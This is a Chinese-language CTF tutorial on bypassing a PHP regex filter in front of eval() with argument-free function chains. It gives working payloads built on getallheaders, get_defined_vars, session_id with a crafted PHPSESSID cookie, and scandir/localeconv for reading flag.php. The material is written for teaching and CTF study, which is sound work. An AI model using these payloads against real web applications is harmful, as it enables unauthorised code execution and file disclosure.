无参数RCE,其实就是通过没有参数的函数达到命令执行的目的。
没有参数的函数什么意思?一般该类题目代码如下(或类似):
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']){
eval($_GET['exp']);
}
?>
先来解读下代码:
';'===preg_replace(...)
,那么就执行exp传递的命令\
: 转义字符不多说了[a-z,_]+
: [a-z,_]
匹配小写字母和下划线 +
表示1到多个(?R)?
: (?R)
代表当前表达式,就是这个(/[a-z,_]+((?R)?)/),所以会一直递归,?
表示递归当前表达式0次或1次(若是(?R)*
则表示递归当前表达式0次或多次,例如它可以匹配a(b(c()d()))
)简单说来就是:这串代码检查了我们通过GET方式传入的exp参数的值,如果传进去的值是传进去的值是字符串接一个(),那么字符串就会被替换为空。如果(递归)替换后的字符串只剩下;
,那么我们传进去的 exp 就会被 eval 执行。比如我们传入一个 phpinfo();
,它被替换后就只剩下;
,那么根据判断条件就会执行phpinfo();
。
(?R)?
能匹配的只有a(); a(b()); a(b(c()));
这种类型的。比如传入a(b(c()));
,第一次匹配后,就剩a(b());
,第二次匹配后,a();
,第三次匹配后就只剩下;
了,最后a(b(c()));
就会被eval执行。
getallheaders()
返回所有的HTTP头信息,但是要注意的一点是这个函数返回的是一个数组,而eval()要求的参数是一个字符串,所以这里不能直接用,这时我们就要想办法将数组转换为字符串。正好implode()
这个函数就能胜任。
implode()
能够直接将getallheaders()
返回的数组转化为字符串。
本地测试代码:
echo implode(getallheaders());
?>
可以看到获取到的头信息被当作字符串输出了,且是从最后开始输出(由于php版本不同,输出顺序也可能不同),那么我们就可以在最后随意添加一个头,插入我们的恶意代码并将后面的内容注释掉。
payload:?exp=eval(implode(getallheaders()));
该图来自csdn的noViC4,我自己没有成功
该函数的作用是获取所有的已定义变量,返回值也是数组。不过这个函数返回的是一个二维数组,所以不能与implode
结合起来用。将get_defined_vars()
的结果用var_dump()
输出结果如下:
var_dump(get_defined_vars());
?>
可以看到用GET传入的参数会被显示在数组中的第一位:
不过这里有这么多的数组,我们也不需要全部查看是吧?那么使用current()
函数就可以办成这个事情:
函数可以返回数组中的单元且初始指针指向数组的第一个单元。因为GET方式传入的参数存在该二维数组中的第一个一维数组(也就是上图array(7)
中的第一个数组["_GET"]=> array(1) { ["get"]=> string(1) "a" }
),所以我们可以通过这个函数将其取出来(官方这个演示很详细了,可以自己看看)。
var_dump(current(get_defined_vars()));
?>
从图中能看出后面传入的shell=phpinfo();
出现在了第一个数组的最后。
end()
想必你应该了解,说简单点就是将 array 的内部指针移动到最后一个单元并返回其值。
回忆一下之前的payload:?exp=eval(implode(getallheaders()));
,设想下:current()是取出二维数组中的第一个(指针指向的那个)一维数组,用end()就可以取出这个一维数组中的最后那个值,加上之前的payload你能想到什么?
新payload:?exp=eval(end(current(get_defined_vars())));&shell=phpinfo();
用这个payload的话就可以执行shell的命令了(理论上可行,我这里环境有问题就不演示了)
官方说:session_id()
可以用来获取/设置当前会话 ID。
那么可以用这个函数来获取cookie中的phpsessionid
了,并且这个值我们是可控的。
但其有限制:
文件会话管理器仅允许会话 ID 中使用以下字符:a-z A-Z 0-9 ,(逗号)和 - (减号)
解决方法:将参数转化为16进制传进去,之后再用hex2bin()函数转换回来就可以了。
所以,payload可以为:?exp=eval(hex2bin(session_id()));
但session_id必须要开启session才可以使用,所以我们要先使用session_start。
最后,payload:?exp=eval(hex2bin(session_id(session_start())));
说到这里,这套组合拳还差了点东西,你还没写你要执行的代码!
不是才说道session_id()可以获取cookie中的phpsessionid,并且这个值我们是可控的
吗?所以我们可以在http头中设置PHPSESSID为想要执行代码的16进制:hex("phpinfo();")=706870696e666f28293b
所以最终组合拳这样打:
我的环境有问题,该图来自noViC4
这种一打开没什么东西的题目,御剑,dirsearch常见备份文件名都去试一试。这道题是.git泄露,我这里使用的是git-extract扫出来的。
可以看到过滤了很多伪协议和字符(相当于过滤了很多函数)。
使用我们的第一个payload:?exp=print_r(scandir(current(localeconv())));
看到flag.php的位置。
为什么这样写payload?
这里要知道一点:想要浏览目录内的所有文件我们常用函数scandir()
。当scandir()
传入.
,它就可以列出当前目录的所有文件。
但这里是无参数的RCE,我们不能写scandir(.)
,而localeconv()
却会有一个返回值,那个返回值正好就是.
再配合current()
或者pos()
不就可以把.
取出来传给scandir()
查看所有的文件了吗?(妙啊)
所以这个组合scandir(current(localeconv()))
很常用,可以记一下。
言归正传。
现在我们知道了flag.php在数组中的倒数第二个位置,但是并没有什么函数可以直接读倒数第二个。
所以我们用array_reverse()
翻转一下数组的顺序,这时flag.php就跑到第二个位置了,然后用next()读第二个不就出来了吗?
如果flag.php的位置不特殊,可以使用
array_rand()
和array_flip()
(array_rand()返回的是键名所以必须搭配array_flip()来交换键名、键值来获得键值,函数作用上面有写到)来随机刷新显示的内容,刷几次就出来了,所以这种情况payload:?exp=show_source(array_rand(array_flip(scandir(current(localeconv())))));
所以最后payload:?exp=show_source(next(array_reverse(scandir(current(localeconv())))));
注意这里要使用show_source
,不然打印不出来。
这个姿势是前面讲过的,因为php不会自动开启session,所以一定要记得session_id(session_start())
来开启。
虽然hex
被ban了,导致无法使用hex2bin()
,但是PHPSESSID本身是可以直接加上例如flag.php
这类的字符的。
所以可以直接在bp里面抓包然后修改一下Cookie就可以了:
这个做法太ez了,你学会了吗?
最终payload:?exp=show_source(session_id(session_start()));
,别忘了修改Cookie: PHPSESSID=flag.php
本文参考链接:
csdn-noViC4(链接太长只能这样了,见谅)
https://blog.csdn.net/silence1_/article/details/102835743(会长yyds,滑稽)
https://www.cnblogs.com/wangtanzhi/articles/12311239.html